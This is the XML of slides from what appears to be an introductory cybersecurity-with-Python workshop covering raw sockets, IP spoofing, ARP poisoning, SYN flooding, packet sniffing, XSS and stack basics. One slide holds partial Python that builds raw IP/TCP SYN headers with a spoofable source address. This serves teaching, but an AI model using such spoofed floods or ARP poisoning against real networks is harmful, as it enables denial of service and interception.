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64" r:id="rId4"/>
    <p:sldId id="265" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="267" r:id="rId9"/>
    <p:sldId id="268" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="261" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="259" r:id="rId15"/>
    <p:sldId id="270" r:id="rId16"/>
    <p:sldId id="271" r:id="rId17"/>
    <p:sldId id="276" r:id="rId18"/>
    <p:sldId id="274" r:id="rId19"/>
    <p:sldId id="278" r:id="rId20"/>
    <p:sldId id="272" r:id="rId21"/>
    <p:sldId id="277" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="283" r:id="rId24"/>
    <p:sldId id="284" r:id="rId25"/>
    <p:sldId id="287" r:id="rId26"/>
    <p:sldId id="285" r:id="rId27"/>
    <p:sldId id="282" r:id="rId28"/>
    <p:sldId id="280" r:id="rId29"/>
    <p:sldId id="286" r:id="rId30"/>
    <p:sldId id="289" r:id="rId31"/>
    <p:sldId id="288" r:id="rId32"/>
    <p:sldId id="290" r:id="rId33"/>
    <p:sldId id="291" r:id="rId34"/>
    <p:sldId id="293" r:id="rId35"/>
    <p:sldId id="292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887" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="11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EEFC5-EBE5-4533-924E-E81618315D9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9F13B-A2FC-42A0-BAAE-F915D98DC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14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basic function of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Transport layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is to accept data from the layer above, split it up into smaller units, pass these data units to the Network layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Raw sockets provides a NULL transport service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why do we even have them in the first place?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To implement new protocols, network acceleration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E9F13B-A2FC-42A0-BAAE-F915D98DC1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31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Address Resolution Protocol: maps IP address to hardware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E9F13B-A2FC-42A0-BAAE-F915D98DC1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67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CD11772-955E-40B6-ACD9-0BE719A65FB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D9CA1C0-44B3-4A89-8D84-906E63EB9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4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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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7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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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09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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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29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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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43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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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82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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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33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CD11772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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07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CD11772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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9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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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5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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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8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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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2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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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6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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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4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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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8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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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6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772-955E-40B6-ACD9-0BE719A65FB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1C0-44B3-4A89-8D84-906E63EB9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CD11772-955E-40B6-ACD9-0BE719A65FB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D9CA1C0-44B3-4A89-8D84-906E63EB9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6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-requests.org/en/master/user/quickstart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wntools.com/en/stable/index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2F7BD-0C87-4B58-870E-0C62DB32F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290456"/>
            <a:ext cx="4798142" cy="31537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Cybersecurity with Python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2AF3BA61-6B4E-4F04-B8F9-AA7639987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8503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9538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82BC5-B502-468D-8501-351759C4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Spoofing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1089-AF83-4FE6-852D-D1223E85C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in DDoS or masquerading as another device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Randomly assigns a source destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Makes it harder to track DDoS back to attackers and block packets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C661EC-7329-4870-BCC8-491A25F8D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301" y="4079307"/>
            <a:ext cx="2266187" cy="226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71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61F655-345C-4AD8-85BC-913D8752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C5F445-C7DF-41C9-BB0A-7C603134B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ARP Poisoning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EBAE0-A572-4FB7-B559-6D81A95E8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DoS, Session Hijacking, Man-in-the-Middle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofs the ARP messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Methods: Sniff network and send out response to both servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If you get there first, you win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2695F-1C15-4844-8F68-CBEB4DA71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07" y="1129118"/>
            <a:ext cx="6391533" cy="459976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518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3AA03-CEA3-469F-994A-27205A1E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 Flooding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C72DA-3DAA-411B-A413-6D5F2559D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of DoS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker continuously sends SYN packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim waits for SYN-ACK packet for each packet for a certain amount of time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suddenly, tons of connections are ‘half-open’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710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4BE4C36A-0466-4152-A02F-8E79D12B7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" y="612844"/>
            <a:ext cx="9298004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ip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header fields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ihl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5 version = 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tot_len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20 + 20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 = 54321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#Id of this packet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frag_off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ttl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255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protocol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socket.IPPROTO_TCP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="12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check = 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saddr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socket.inet_aton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source_ip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)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#Spoof the source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ip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address if you want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daddr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socket.inet_aton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dest_ip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ihl_version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(version &lt;&lt; 4) +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ihl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 the ! in the pack format string means network order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ip_header</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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pack('!BBHHHBBH4s4s' , </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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ihl_version</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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tos</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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tot_len</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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id, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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frag_off</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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protocol, check, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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saddr</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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daddr</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0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header fields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source = 1234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 source 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80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 destination port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seq =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ack_seq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doff = 5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#4 bit field, size of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tcp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header, 5 * 4 = 20 bytes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tcp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flags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fin =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syn =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psh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ack =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err="1">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>u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window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socket.htons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(5840)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 maximum allowed window size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check =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urg_ptr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636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B86E-095B-4F0F-BF3A-DF743032C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sniffing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6B2A3-1195-41A4-9D4A-4CAB78CF0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packet sniffing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Capturing the data packets that are used for networking communication </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why do we do packet sniffing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reveals the traffic and activities of people connected to a network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be evaded through encryption of the data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We use TLS (formerly, SSL) to ensure this encryption and certify sites as HTTPS when this is enabled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="616448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7686-7A77-4018-B187-EC59AE25B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sniff some packets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2C2A00-1979-4EC6-878B-284EEFFE6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43" y="3026832"/>
            <a:ext cx="2857500" cy="28575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00B39B-6BC8-4CB3-9DC6-D5BB825A3130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5265019" y="3748618"/>
            <a:ext cx="38693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TCPDUMP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3886428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7686-7A77-4018-B187-EC59AE25B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sniff some packets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2C2A00-1979-4EC6-878B-284EEFFE6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43" y="3026832"/>
            <a:ext cx="2857500" cy="28575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00B39B-6BC8-4CB3-9DC6-D5BB825A3130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5265019" y="3748618"/>
            <a:ext cx="38693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WIRESHARK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1302124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DAA8-F9F7-4B79-A8A1-5AB3BD1D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Site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DB23B-F84C-4A8A-9D0B-0C2EB923B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of injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker sends malicious code to a website, which uses the code as a part of the website and serves it to a user or users as the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can do anything from access cookies to steal session tokens to perform actions in place of user to steal data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1588351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4334B-CEA3-4F80-9714-5A3E26FEC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Site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42E76-1032-4B72-B795-6C2B7B865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Two types:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored: site takes in user input and inserts it into the website, server, or database as a part of the code for all users to access while interpreting it as code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected: site takes in user input and reflects the result of the interpreted code back to the user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3681909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5BB39-E536-498F-BB0F-EC5DA938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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="401517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7CA8-5917-4EE2-8091-668A31A9E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298FE-0DA4-4361-B00F-B7543DEDE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6441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First half</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Networking and Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port scanning, raw sockets, packet sniffing, XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web exercise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15 minute break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Second half</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: C, Reverse engineering and binary exploitation (pwn)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C basics, intro to x86 ASM, pwn basics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pwn exercise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823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4E094-F388-4420-87BD-BDD3F8C0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9E453-D62D-48BF-8395-5EA75A957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 install requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>import requests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http://docs.python-requests.org/en/master/user/quickstart/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28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DCD8-D6D0-439A-B5DA-DC1EC54C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9A5CD-386B-4368-9AF2-0D98BBABE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compiles it into machine code as an executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The highest form of code that can be recovered from the machine code is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>assembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>disassembling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We read the assembly instructions of the code to figure out what the code is doing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used in malware analysis, nation-state level offensive research, video game hacking,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75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D316-9320-40A0-8D3F-38F0DCB2BA1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86408" y="1447149"/>
            <a:ext cx="4545013" cy="36099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x86-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vs x86-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>32-bit vs 64-bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most use 64-bit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Two syntax versions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intel vs AT&amp;T</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different syntax to read the same code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No one likes AT&amp;T</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="https://lh3.googleusercontent.com/GnjT-GlWmF5G0oz2OS8l-CJ1s30oOnb0QuJI8ceoRpu3gOBlgkIFxV7a5fDzt4b4uz_1qOZhw1P2MiAW0Vj6xrjRVrZs_xvU1ZhYzAN6PQx5jJ4lE4ZECsoEW-NLOins80KUlB_7Tv4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA5EFD4-9449-4AC9-AB9C-770997178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536" y="1717670"/>
            <a:ext cx="5619467" cy="306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698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5C24-EDC5-4C2E-B3C9-944C0305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1D439-7133-4575-B6C8-EDB294515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RAX-RDX : General-Purpose Registers, stores values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RBP,RSP : Base pointer, Stack pointer, stores our location in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each function is limited to a range of addresses in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Base pointer is our bottom limit for the function we’re in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack pointer is the top limit in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RIP : Instruction Pointer, stores what instruction we’re on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1785242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9428-B076-4864-B63E-F9B92A29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37A54-7AF0-4BB4-9FF9-FD70F1649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Data structure in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grows downward</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LIFO (Last in First Out)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static memory allocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saves your local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ex: int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09653D-B7F9-42C9-8B39-0729A4F0F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783" y="2719224"/>
            <a:ext cx="4490617" cy="314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60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441C0F-9786-46D0-9E14-B60A02B640EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1198707" y="1194800"/>
            <a:ext cx="26712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function1 (int a) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	int x ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	int y = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	int z = 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	return z;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3D2E4F-C2CA-4633-8C1A-F7477E013C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5420308" y="1194646"/>
            <a:ext cx="3440485" cy="500605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60EE34-EC04-4A69-B414-D4533E8B400C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9240715" y="1194646"/>
            <a:ext cx="0" cy="27871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2EAA63-D18B-41AB-8C38-66F42566BEDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5600700" y="395654"/>
            <a:ext cx="293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4D9A1B-48B7-424C-A145-B8CAA55CDE5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2031023" y="394039"/>
            <a:ext cx="155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AA4C69-A0A9-4877-9354-6E2E0FF88E88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5420308" y="1194646"/>
            <a:ext cx="3440485" cy="46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2DB1C9-E3D4-4310-B846-69266EC004AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414451" y="1707534"/>
            <a:ext cx="3440485" cy="46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BB94A1-1DC3-4C39-B623-6820822E74DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5426165" y="2211630"/>
            <a:ext cx="3440485" cy="46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C6408F-A953-4A75-A772-EA89B8AB6E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5426165" y="2726346"/>
            <a:ext cx="3440485" cy="46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A426A2-BEF0-4FBF-85AF-AAF4BF2E6ACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5423236" y="3237394"/>
            <a:ext cx="3440485" cy="46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A73B0B-D61F-4C37-8B73-FF15FAF44411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5423236" y="3743306"/>
            <a:ext cx="3440485" cy="46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C24677-8A9D-44D5-8532-52AFBACC8690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6233747" y="1243530"/>
            <a:ext cx="204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value of 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FA3929-13AB-47A7-96A5-6B2D46DFBDEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5962253" y="2226244"/>
            <a:ext cx="291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previous base pointer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42A289-84C1-408A-95BE-B3A3D42EFA3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6209525" y="1733915"/>
            <a:ext cx="204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return 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DFB3C1-D2BA-4F28-A4F6-60C99DA2726C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5962253" y="2756642"/>
            <a:ext cx="251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value of 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E1D6AF-7E35-4D79-B568-341E612D9ADF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3237394"/>
            <a:ext cx="218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value of y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1665D1-CAC4-4D61-A11F-E57EEA703D44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6279863" y="3767859"/>
            <a:ext cx="180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value of z =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E8C693-770E-4FBC-8BA6-2A8282E6E4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9081085" y="737390"/>
            <a:ext cx="83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0xFFF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6E4A24-8F2C-4A18-A9DE-9378B8428E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9085462" y="4209187"/>
            <a:ext cx="111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DABF5A-3531-4E8F-8A0B-E98811D20C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4606088" y="3813479"/>
            <a:ext cx="96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RSP &gt;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B90EB6-5287-4B79-93E2-8AEEF1A7C469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4576776" y="1248840"/>
            <a:ext cx="96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RBP &gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
